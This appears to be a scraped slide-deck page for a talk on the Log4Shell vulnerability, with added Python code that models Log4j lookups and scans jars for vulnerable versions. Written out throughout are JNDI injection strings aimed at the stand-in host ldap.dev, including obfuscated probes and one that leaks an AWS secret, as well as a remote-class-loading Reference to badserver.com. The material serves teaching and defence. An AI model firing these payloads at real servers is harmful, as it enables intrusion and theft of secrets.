Log4Shell - Armageddon or Opportunity
Steve Poole
@spoole167
9th December - a normal day at the office
10th December 2021
And then
it grew
And grew
And grew
And grew
Log4Shell may be the worst ever vulnerability
It just keeps on giving
Log4J vulnerability - the wrong thing at the wrong time, for a long time
Log4J CVE-2021-44228 - fixes a problem that has been around since 2014
Today
The basics behind most Java exploits
The mechanics of a Log4Shell exploit
A Log4Shell demo
Breaking down the attack types: risk, reward, detection, applicability
Prevention / related tools
Larger consequences - why the White House got involved
Wake up call - understanding that fire-drills are here to stay.
Revisiting your supply chains
Wrap up
The basics behind most Java exploits
Main objective: arbitrary remote code execution. Bad actors can then do whatever they want: steal data, change data, add malware, …
Vehicle: Java serialization, or text-to-execution features (from XML tags to scripting languages to text formatters).
Leave no trace.
Secondary objective: leak, change or insert data (secrets, configs, device info, etc.) using gadget chains, human error, or a limited ability to manipulate config data.
The basics behind most Java exploits
Attacks come from relentless scripted botnets using sophisticated tools to probe endpoints.
Imagine a burglar trying every door and window, in every building on the planet, every moment of the day and night.
Reverse engineering: fuzzing calls and data, for example
GET /users/1
POST /users/2
PUT /users/20000?name=“(select
GET /users/-1
Reverse engineering is done with sophisticated tools: fuzz URLs, JSON payloads, XML payloads, binary payloads, import/export/upload/download options, command-line options, file formats, and "known-to-be-dangerous" values.
These tools are in the public domain, widespread and mature, with automatic 'protocol' detection and exploitation.
Log4Shell is a gift to the bad actors. It’s been
there since 2014
Log4J - the exploited mechanics
Probably every Java developer has used or is using Log4J. Somewhere in the code there will be a couple of imports and a field:
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
Logger logger = LoggerFactory.getLogger(MyApp.class);
Then throughout the code there will be various calls to the logger to record data:
logger.info("Entering application");
logger.debug("device id {}", id);
logger.info("X-Header {}", headers.get("X-Header"));
Log4J - the exploited mechanics
Then the log might contain:
2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application
2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ
2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa
Since Log4J is a debugging tool, it is important to record input data as-is.
If the application or component is used in different environments, recording basic environment info in the log would be good too!
And Log4J makes that even easier for you.
Log4J - the exploited mechanics
logger.info("version {}", System.getProperty("java.version"));
logger.info("version ${sys:java.version}");
2022-01-01 09:07:41,508 [main] INFO MyApp - version 1.17.1
Both calls produce the same line. These substitution parameters, or "lookups", provide convenience and robustness:
${sys:<system-property-name>}
${env:<environment-variable-name>}
${log4j:configLocation}
Log4J - the exploited mechanics
Put together the expectation to log input data as-is + lookups. A request arrives with a header:
User-Agent: Mozilla/5.0
log.info("User Agent: {}", userAgent);
2022-01-01 09:07:41 [main] INFO User Agent: Mozilla/5.0
Now the same code, when the header contains a lookup:
User-Agent: ${sys:java.version}
log.info("User Agent: {}", userAgent);
2022-01-01 09:07:41 [main] INFO User Agent: 1.8.0
The lookup arrived as a parameter value, not in the format string, and it was still evaluated: vulnerable versions run substitution over the whole formatted message.
Log4J - the exploited mechanics
We’re not finished yet.
In 2014 a new Lookup was added for JNDI to allow logging of service
configuration info in a consistent way. No different from the other lookups.
However..
The lookup also enabled other registered JNDI services to be used: LDAP, RMI, DNS …
Log4J - the exploited mechanics
One more thing. For most Log4J versions, processing substitution parameters is recursive: the value a lookup returns is itself scanned for lookups.
Envvar: MODE="${sys:java.version}"
Log: log.info("${env:MODE}")
Result: "1.8.1" etc. (the env lookup yields ${sys:java.version}, which is then resolved in turn)
Log4J - the exploited mechanics
Situation: over-powerful Log4J lookups and substitution, coupled with a desire to write input data as-is.
Result: a field day for bad actors.
Within 4 days, half of all corporate networks globally had been actively probed, with over 60 variants of the exploit.
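How the substitution engine behaves, modelled in Python as an added example (this is not Log4J source and not the talk's demo code; the system property values, environment variables and User-Agent strings are constructed). It shows the recursion that turns ${env:MODE} into a Java version, how a nested lookup carries data out inside a JNDI URL, why the many probe variants mentioned above normalise to the same request when you evaluate them the way Log4J would (a more reliable detection than grepping for the literal string jndi:), and what disabling message lookups changes.

```python
"""Model of Log4j 2's recursive ${...} lookup substitution (added example, not Log4j source).
The lookup syntax (sys, env, lower, upper, jndi, the ':-' default) is real; all values are constructed."""
from dataclasses import dataclass, field

# Constructed stand-ins for the target JVM's system properties and environment.
SYS_PROPS = {"java.version": "1.8.0_102"}
ENV_VARS = {"MODE": "${sys:java.version}", "AWS_SECRET_ACCESS_KEY": "constructed-secret"}
MAX_DEPTH = 8  # stop expansions that never settle

@dataclass
class Outcome:
    text: str                                          # what ends up in the log line
    jndi_requests: list = field(default_factory=list)  # URLs the JVM would connect to


def _matching_brace(text, start):
    """Index of the '}' closing a '${' whose content begins at `start`, or -1."""
    depth, i = 1, start
    while i < len(text):
        if text.startswith("${", i):
            depth, i = depth + 1, i + 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def resolve(key, out):
    """Resolve one lookup key such as 'sys:java.version' or 'env:NAME:-default'."""
    if ":" not in key:
        return None
    prefix, rest = key.split(":", 1)
    name, has_default, default = rest.partition(":-")
    default = default if has_default else None
    prefix = prefix.lower()
    if prefix in ("sys", "env"):
        return (SYS_PROPS if prefix == "sys" else ENV_VARS).get(name, default)
    if prefix in ("lower", "upper"):
        return getattr(name, prefix)()
    if prefix == "jndi":
        out.jndi_requests.append(name)  # a real JVM connects here and deserializes/loads the reply
        return f"<object from {name}>"
    return default  # unknown prefix, e.g. '${::-j}': literal is kept unless a default was given


def substitute(text, out, depth=0):
    """Expand ${...} innermost-first, then re-expand each result (this is the recursion)."""
    if depth > MAX_DEPTH:
        return text
    pieces, i = [], 0
    while i < len(text):
        if not text.startswith("${", i):
            pieces.append(text[i])
            i += 1
            continue
        end = _matching_brace(text, i + 2)
        if end == -1:
            pieces.append(text[i:])
            break
        inner = substitute(text[i + 2:end], out, depth + 1)
        value = resolve(inner, out)
        pieces.append("${" + inner + "}" if value is None else substitute(value, out, depth + 1))
        i = end + 1
    return "".join(pieces)


def format_message(fmt, *params, message_lookups=True):
    """Mimic logger.info(fmt, params...): fill the {} placeholders, then, as vulnerable versions
    did, substitute over the whole message. message_lookups=False models 2.15+/2.16+."""
    out = Outcome("")
    msg = fmt
    for p in params:
        msg = msg.replace("{}", str(p), 1)
    out.text = substitute(msg, out) if message_lookups else msg
    return out


def probe_detected(value):
    """Evaluate untrusted input the way vulnerable Log4j would and return the JNDI URLs
    it would contact. Obfuscated variants normalise to the same URL; [] means clean."""
    out = Outcome("")
    substitute(value, out)
    return out.jndi_requests


# Constructed User-Agent values: one benign, then probes of increasing obfuscation.
SAMPLE_HEADERS = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "${jndi:ldap://ldap.dev:1389/echo/${sys:java.version}}",
    "${${lower:J}${lower:N}di:${lower:L}dap://ldap.dev:1389/a}",
    "${${::-j}ndi:rmi://ldap.dev:1099/a}",
    "${jndi:ldap://ldap.dev:1389/${env:AWS_SECRET_ACCESS_KEY:-none}}",
]

if __name__ == "__main__":
    print(format_message("${env:MODE}").text)  # env -> ${sys:java.version} -> 1.8.0_102
    for h in SAMPLE_HEADERS:
        print(f"{h!r:70} -> {probe_detected(h)}")
```

Running it prints the resolved MODE value and, for each sample header, the JNDI URL a vulnerable JVM would reach out to (none for the benign one); the three obfuscated probes all collapse to a plain ldap:// or rmi:// URL once evaluated. The same evaluator doubles as a normaliser for detection rules: match on the resolved URL list rather than on raw header text. With message_lookups=False the attacker's text is logged unexpanded and no request is recorded, which is what the 2.15+ and 2.16+ changes achieve.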
Let’s see it in action
What you saw
Exposing environment data
Transmitting environment data
Running a gadget chain
Arbitrary Remote Code Execution
A simple hidden attack
Exposing environmental data
Concept: can the bad actor force sensitive data to appear in the log?
Impact: low as a standalone attack (no immediate feedback); high if logs are visible (compromised server, log aggregators).
At risk: java version, classpath, properties that are publicly known or can be guessed (see fuzzing).
${sys:java.version}
Aside - logs are more vulnerable than you might imagine
Sometimes logs (and other files) are accessible externally, and they are easily found: useful search terms are catalogued on exploit-db.com.
Transmitting environmental data
Concept: can the bad actor send sensitive data to another server?
Impact: medium to high. IP info is leaked at a minimum (the victim connects out to the attacker's server); high if recursive substitution is available.
At risk: java version, classpath, properties that are publicly known or can be guessed (see fuzzing).
${jndi:ldap://ldap.dev:1389/cn=version}
The request is sent to the attacker's LDAP server, which sends back a response that Log4J then evaluates. With recursion, the attacker nests a lookup inside the URL:
${jndi:ldap://ldap.dev:1389/echo/${sys:java.version}}
The inner lookup is resolved first, so what reaches the LDAP server is
${jndi:ldap://ldap.dev:1389/echo/1.8_01}
and the value travels out in the request path.
Running a gadget chain
Concept: can the bad actor cause code to execute under their control?
Impact: high to very high. Java gadget chains are complicated but easily constructed; arbitrary RCEs are possible.
At risk: everything. Access to data, systems etc.
${jndi:ldap://ldap.dev:1389/cn=gadget}
A simple gadget chain
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
Map<String, Object> m = new HashMap<>();
m.put("key is $${sys:java.version}", "${sys:java.version}");
List<String> list = new LinkedList<>();
list.add("this");
list.add("is");
list.add("a");
list.add("nested");
list.add("list");
m.put("gadget-chain", list);
This map is serialized and served by the attacker's LDAP server: the ${jndi:ldap://ldap.dev:1389/cn=gadget} call expects a serialized Java object stream to be returned, and the deserialized object's toString() (lookups included) is what ends up in the log.
Various results, by Log4J version:
2.0 - 2.3 and 2.4 - 2.5: no gadget output reaches the log (see the note on the (String) cast under Arbitrary Remote Code Execution below)
2.3.1, 2.3.2 and 2.15 - 2.17.1: the lookup is not evaluated and is logged literally:
add todo(title=${jndi:ldap://ldap.dev:1389/cn=gadget}, status=ACTIVE)
2.6 - 2.14.1: the returned object is deserialized and its toString(), with the nested lookups resolved, is logged:
add todo(title={gadget-chain=[this, is, a, nested, list], key is 1.8.0_102=1.8.0_102}, status=ACTIVE)
Running a gadget chain to cause a DoS
Concept: can the bad actor crash the application?
Impact: high to very high. Easy to achieve.
At risk: availability. Leads to ransom threats.
${jndi:ldap://ldap.dev:1389/cn=boom}
A simple DoS gadget chain
Object[][] o = new Object[][]{ new Object[0] };
Serialize it, then use serialization tools to rewrite the array lengths in the stream so that it claims to be:
Object[][] o = new Object[Integer.MAX_VALUE][Integer.MAX_VALUE]; // not real Java: what the tampered stream describes
OOM every time? The ${jndi:ldap://ldap.dev:1389/cn=boom} call expects a serialized Java object stream to be returned, and deserialization allocates each array at its declared length before reading the contents.
Arbitrary Remote Code Execution
For some versions of Log4J we're lucky: the RCE fails unintentionally. This got "fixed" later, when the (String) cast on the lookup result was replaced with a toString():
Arbitrary Remote Code Execution
Reference ref = new Reference("ExternalObject", "ExternalObject", "http://badserver.com/code/");
If the object the LDAP server returns is a Reference like this one, the ${jndi:ldap://ldap.dev:1389/cn=rce} call makes the JVM's JNDI client go to the bad server and download the named class, one of these:
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
public class ExternalObject implements ObjectFactory {
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)
            throws Exception {
        // runs inside the application as soon as the Reference is resolved
        return null;
    }
}
getObjectInstance() is executed in the application, and any further code it needs is downloaded from the bad server.
Arbitrary Remote Code Execution
Various results, older Java versions (before the JNDI remote codebase trust default was changed):
RCE succeeds: 2.0 - 2.3, 2.4 - 2.12.1, 2.13.0 - 2.14.1
RCE fails: 2.3.1, 2.3.2, 2.12.2 - 2.12.4, 2.15+
Various results, Java 17+: remote class loading over JNDI is off by default (com.sun.jndi.ldap.object.trustURLCodebase=false), so this path only works if the property has been turned back on; see the next slide.
Hidden attacks
${jndi:ldap://ldap.dev:1389/a}
Take the RCE attack and spin it slightly: ensure the last object returned is a String, so nothing unusual appears in the log.
Although the JNDI defaults to trust remote content were changed in Java, they can still be turned on. Especially vulnerable are tools that launch processes:
com.sun.jndi.ldap.object.trustURLCodebase
com.sun.jndi.ldap.object.trustSerialData
Log4Shell is deadly
Move to the latest version of Log4J.
Move to the latest version of Java you can.
Re-evaluate your scanning and checking tools. Many do not do a good job!
Also look for fat jars with Log4J code bundled inside them.
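A checker for the fat-jar point above, added here as an example (it is not a tool from the talk or from the Log4J project, and the sample jar it builds for itself is constructed). It opens every jar, war and ear under a directory, recurses into nested jars, reads log4j-core's pom.properties for the version and looks for JndiLookup.class, flagging anything that still ships the class below the fully fixed releases (2.17.1, or 2.12.4 and 2.3.2 on the Java 7 and Java 6 lines).

```python
"""Find Log4j 2 core inside jars, wars and fat jars (added example, not a tool from the
talk). Filename checks miss log4j-core bundled under BOOT-INF/lib or shaded into another
jar, so this opens every archive, recurses into nested jars, reads log4j-core's
pom.properties for the version and checks whether JndiLookup.class is still present."""
import io
import os
import re
import sys
import zipfile
from dataclasses import dataclass
from typing import Optional

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version):
    """Leading numeric part only: '2.14.1' -> (2, 14, 1), '2.0-beta9' -> (2, 0, 0)."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    return tuple(int(g or 0) for g in m.groups()) if m else (0, 0, 0)


def is_fixed(version):
    """Releases carrying all the Log4Shell-era fixes (CVE-2021-44228 through
    CVE-2021-44832): 2.3.2+ on the Java 6 line, 2.12.4+ on Java 7, 2.17.1+ otherwise."""
    v = parse_version(version)
    if v[:2] == (2, 3):
        return v >= (2, 3, 2)
    if v[:2] == (2, 12):
        return v >= (2, 12, 4)
    return v >= (2, 17, 1)


@dataclass
class Finding:
    path: str               # e.g. app.jar!/BOOT-INF/lib/log4j-core-2.14.1.jar
    version: Optional[str]  # None when pom.properties is absent (repackaged/shaded copy)
    has_jndi_lookup: bool

    @property
    def needs_action(self):
        # An unknown version that still ships JndiLookup.class is treated as vulnerable.
        return self.has_jndi_lookup and (self.version is None or not is_fixed(self.version))


def inspect_jar(data, path):
    """Yield a Finding for each log4j-core in `data`, recursing into nested jars."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        # endswith() rather than equality so a shaded (package-relocated) copy is caught
        has_lookup = any(n.endswith("/core/lookup/JndiLookup.class") for n in names)
        if version or has_lookup:
            yield Finding(path, version, has_lookup)
        for n in names:
            if n.lower().endswith(".jar"):
                yield from inspect_jar(zf.read(n), f"{path}!/{n}")


def scan_tree(root):
    """Inspect every archive under `root`; returns a list of Finding."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".jar", ".war", ".ear", ".zip")):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(inspect_jar(fh.read(), full))
    return findings


def build_sample_jar(version, nested=True):
    """Constructed fixture: a minimal log4j-core jar, optionally wrapped in a Spring Boot
    style fat jar. Real jars hold thousands of entries; only the two read above matter."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    if not nested:
        return core.getvalue()
    app = io.BytesIO()
    with zipfile.ZipFile(app, "w") as zf:
        zf.writestr("BOOT-INF/classes/com/example/App.class", b"\xca\xfe\xba\xbe")
        zf.writestr(f"BOOT-INF/lib/log4j-core-{version}.jar", core.getvalue())
    return app.getvalue()


if __name__ == "__main__":
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        flag = "VULNERABLE" if f.needs_action else "ok"
        print(f"{flag:10} {f.version or 'unknown':10} jndi={f.has_jndi_lookup} {f.path}")
```

Run it with a directory as the argument (defaults to the current one). A 2.17.1 jar still contains JndiLookup.class and is reported as ok; a copy with no pom.properties but with the class present is reported as needing action, since a build that repackages log4j-core usually drops the Maven metadata but not the classes. The version logic covers only the CVE-2021-44228 family; it is not a general vulnerability database.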
We're not doing a good job patching: https://www.sonatype.com/resources/log4j-vulnerability-resource-center
The last bits
Larger consequences - why the White House got involved
Wake up call - understanding that fire-drills are here to stay.
Revisiting your supply chains
Thank you

 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 

Log4Shell - Armageddon or Opportunity.pptx

  • 1. Log4Shell - Armageddon or Opportunity Steve Poole @spoole167
  • 2. 9th December - a normal day at the office
  • 8. Log4Shell may be the worst ever vulnerability
  • 9. It just keeps on giving
  • 10. Log4J vulnerability - the wrong thing at the wrong time, for a long time Log4J CVE-2021-44228 - Fixes a problem that’s been around since 2014
  • 11. Today
    The basics behind most Java exploits
    The mechanics of a Log4Shell exploit
    A Log4Shell demo
    Breaking down the attack types: risk, reward, detection, applicability
    Prevention / related tools
    Larger consequences - why the White House got involved
    Wake up call - understanding that fire-drills are here to stay
    Revisiting your supply chains
    Wrap up
  • 12. The basics behind most Java exploits
    Main objective: arbitrary remote code execution. Bad actors can do whatever they want: steal data, change data, add malware ... Use Java serialization or text-to-execution vehicles (from XML tags to scripting languages to text formatters). Leave no trace.
    Secondary objective: leak, change, insert data (secrets, configs, device info etc). Gadget chains, human error, limited ability to manipulate config data.
  • 13. The basics behind most Java exploits Attacks come from relentless scripted botnets using sophisticated tools to probe end points Imagine a burglar, trying every door and window, in every building on the planet every moment of the day and night
  • 14. Reverse Engineering - fuzzing calls and data
    GET /users/1
    POST /users/2
    PUT /users/20000?name="(select
    GET /users/-1
  • 16. Reverse Engineering - fuzzing calls and data
    Fuzz URLs, JSON payloads, XML payloads, binary payloads ...
    Import / export / upload / download options ...
    Command line options, file formats ...
    "Known-to-be-dangerous" values
    The tooling is in the public domain, widespread and mature, with automatic 'protocol' detection and exploitation
  • 17. Log4Shell is a gift to the bad actors. It’s been there since 2014
  • 18. Log4J - the exploited mechanics
    Probably every Java developer has used or is using Log4J. Somewhere in the code will be a couple of imports and a field:
      import org.slf4j.Logger;
      import org.slf4j.LoggerFactory;
      Logger logger = LoggerFactory.getLogger(<Class>.class);
    Then throughout the code will be various calls to the logger to record data:
      logger.info("Entering application");
      logger.debug("device id {}", id);
      logger.info("X-Header {}", headers.get("X-Header"));
  • 19. Log4J - the exploited mechanics
    Then the log might have:
      2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application
      2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ
      2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa
  • 20. Log4J - the exploited mechanics
      2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application
      2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ
      2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa
      logger.info("Entering application");
      logger.debug("device id {}", id);
      logger.info("X-Header {}", headers.get("X-Header"));
    Since Log4J is a debugging tool, it's important to record input data as-is.
  • 21. Log4J - the exploited mechanics
    If the application or component is used in different environments then recording basic info in the log would be good! But Log4J makes it even easier for you:
      logger.info("version {}", System.getProperty("java.version"));
      logger.info("version ${sys:java.version}");
      2022-01-01 09:07:41,508 [main] INFO MyApp - version 1.17.1
  • 22. Log4J - the exploited mechanics
    These substitution parameters or 'lookups' provide convenience and robustness:
      ${sys:<system-property-name>}
      ${env:<environment-variable-name>}
      ${log4j:configLocation}
  • 23. Log4J - the exploited mechanics
    Put together the expectation to log input data as-is + lookups:
      User-Agent: Mozilla/5.0
      log.info("User Agent: {}", userAgent);
      2022-01-01 09:07:41 [main] INFO User Agent: Mozilla/5.0
    With a lookup in the header instead:
      User-Agent: ${sys:java.version}
      log.info("User Agent: {}", userAgent);
      2022-01-01 09:07:41 [main] INFO User Agent: 1.8.0
  • 24-25. Log4J - the exploited mechanics
    We're not finished yet. In 2014 a new lookup was added for JNDI to allow logging of service configuration info in a consistent way. No different from the other lookups. However... the lookup also enabled other registered JNDI services to be used: LDAP, RMI, DNS ...
  • 26. Log4J - the exploited mechanics
    One more thing. For most Log4J versions, processing substitution parameters is recursive:
      Environment variable: MODE="${sys:java.version}"
      Log call: log.info("${env:MODE}")
      Result: "1.8.1" etc
  • 27. Log4J - the exploited mechanics
    Situation: over-powerful Log4J lookups and a substitution process, coupled with a desire to write input data as-is.
    Result: a field day for bad actors. Within 4 days half of all corporate networks globally had been actively probed, with over 60 variants of the exploit.
  • 28. Let’s see it in action
  • 29. What you saw
    Exposing environment data
    Transmitting environment data
    Running a gadget chain
    Arbitrary remote code execution
    A simple hidden attack
  • 30. Exposing environmental data
    Concept: can the bad actor force sensitive data to appear in the log?
    Impact: low as a standalone attack (no immediate feedback); high if logs are visible (compromised server, log aggregators).
    At risk: Java version, classpath, properties that are publicly known or can be guessed (see fuzzing).
    ${sys:java.version}
  • 31. Aside - logs are more vulnerable than you might imagine Sometimes logs (and other files) are accessible externally
  • 32. Aside - logs are more vulnerable than you might imagine Easily found via
  • 33. Aside - logs are more vulnerable than you might imagine useful search terms exploit-db.com
  • 34. Transmitting environmental data
    Concept: can the bad actor send sensitive data to another server?
    Impact: medium to high. IP info is leaked at a minimum; high if recursive substitution is available.
    At risk: Java version, classpath, properties that are publicly known or can be guessed (see fuzzing).
    ${jndi:ldap://ldap.dev:1389/cn=version}
  • 36. Running a gadget chain
    Concept: can the bad actor cause code to execute under their control?
    Impact: high to very high. Java gadget chains are complicated but easily constructed. Arbitrary RCEs are possible.
    At risk: everything. Access to data, systems etc.
    ${jndi:ldap://ldap.dev:1389/cn=gadget}
  • 37. A simple gadget chain
      HashMap<String, Object> m = new HashMap<>();
      m.put("key is $${sys:java.version}", "${sys:java.version}");
      List<String> list = new LinkedList<>();
      list.add("this"); list.add("is"); list.add("a"); list.add("nested"); list.add("list");
      m.put("gadget-chain", list);
    ${jndi:ldap://ldap.dev:1389/cn=gadget}
    This call expects a serialized Java object stream to be returned.
  • 38. Various results
    2.0 - 2.3, 2.4 - 2.5, 2.3.1, 2.3.2, 2.15 - 2.17.1:
      add todo(title=${jndi:ldap://ldap.dev:1389/cn=gadget}, status=ACTIVE)
    2.6 - 2.14.1:
      add todo(title={gadget-chain=[this, is, a, nested, list], key is 1.8.0_102=1.8.0_102}, status=ACTIVE)
  • 39. Running a gadget chain to cause a DoS
    Concept: can the bad actor cause code to crash an application?
    Impact: high to very high. Easy to achieve.
    At risk: availability. Leads to ransom threats.
    ${jndi:ldap://ldap.dev:1389/cn=boom}
  • 40. A simple DoS gadget chain
      Object[][] o = new Object[][]{ new Object[0] };
    Use serialization tools to turn it into:
      Object[][] o = new Object[INT_MAX][INT_MAX]   // not real Java
    OOM every time?
    ${jndi:ldap://ldap.dev:1389/cn=boom}
    This call expects a serialized Java object stream to be returned.
  • 41. Arbitrary Remote Code Execution
    For some versions of Log4J we're lucky: the RCE fails unintentionally. This got "fixed" - the (String) cast was replaced with a toString().
  • 42. Arbitrary Remote Code Execution
    ${jndi:ldap://ldap.dev:1389/cn=rce}
    If the returned object is one of these:
      Reference ref = new Reference("ExternalObject", "ExternalObject", "http://badserver.com/code/");
    this call makes Log4J go to the bad server and downloads ...
  • 43-45. Arbitrary Remote Code Execution
    ${jndi:ldap://ldap.dev:1389/cn=rce}
    One of these:
      public class ExternalObject implements javax.naming.spi.ObjectFactory
    with this method:
      public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception
    The method gets executed in the application and any required code is downloaded from the bad server.
  • 46. Arbitrary Remote Code Execution
    Various results, older Java versions:
    2.0 - 2.3, 2.4 - 2.12.1, 2.13.0 - 2.14.1
    2.3.1, 2.3.2, 2.12.2 - 2.12.14, 2.15+
  • 47. Arbitrary Remote Code Execution Various results: Java 17+
  • 48. Hidden attacks ${jndi:ldap://ldap.dev:1389/a} Take the RCE attack and spin it slightly. Ensure the last object returned is a String
  • 49. Hidden attacks
    ${jndi:ldap://ldap.dev:1389/a}
    Although the JNDI defaults for trusting remote code were changed in Java, they can still be turned on. Especially vulnerable are tools that launch processes.
      com.sun.jndi.ldap.object.trustURLCodebase
      com.sun.jndi.ldap.object.trustSerialData
  • 50. Log4Shell is deadly
    Move to the latest version of Log4J
    Move to the latest version of Java you can
    Re-evaluate your scanning/checking tools. Many do not do a good job!!
    Also look for fat jars with Log4J code
  • 51. We're not doing a good job patching
    https://www.sonatype.com/resources/log4j-vulnerability-resource-center
  • 52. The last bits
    Larger consequences - why the White House got involved
    Wake up call - understanding that fire-drills are here to stay
    Revisiting your supply chains
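Slide 50 warns that many scanners miss log4j-core hidden inside fat jars. As an added example (not from the deck), this Python scanner recurses into nested .jar/.war/.ear entries, reads the log4j-core version from Maven's pom.properties, flags JndiLookup.class even in shaded jars that carry no pom.properties, and rates the version against the fixed lines listed on slide 46 (2.3.1/2.3.2, 2.12.2+, 2.15+); the fat jar it scans is a constructed fixture built inline, not a real artifact.

```python
import io
import re
import zipfile

# The class behind ${jndi:...} lookups in log4j-core, and where Maven records the version
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def vulnerable_version(version):
    """True if log4j-core predates the fixed lines on slide 46; None if the version is unknown."""
    if version is None:
        return None
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    v = tuple(nums + [0] * (3 - len(nums)))       # "2.0-beta9" -> (2, 0, 9), "2.15" -> (2, 15, 0)
    if v[:2] == (2, 3):
        return v < (2, 3, 1)
    if v[:2] == (2, 12):
        return v < (2, 12, 2)
    return v < (2, 15, 0)

def scan_jar(data, path="app.jar"):
    """Walk one jar and every nested jar inside it; return (path, version or None, JndiLookup present)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version or JNDI_LOOKUP in names:       # shaded jars carry the class but no pom.properties
            findings.append((path, version, JNDI_LOOKUP in names))
        for name in names:
            if name.lower().endswith((".jar", ".war", ".ear")):
                findings.extend(scan_jar(zf.read(name), path + "!/" + name))
    return findings

def build_sample_fatjar():
    """Constructed fixture, not a real artifact: a Spring-Boot-style jar embedding a stand-in
    log4j-core 2.14.1 jar. Class entries are placeholder bytes, not compiled code."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nversion=2.14.1\n")
        z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("BOOT-INF/classes/app/Main.class", b"\xca\xfe\xba\xbe")
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
    return outer.getvalue()
```

Run `scan_jar(open(path, "rb").read(), path)` over each deployable artifact; the nested path tells you which fat jar to rebuild, and a hit with `version is None` but JndiLookup present is a shaded copy that needs manual inspection.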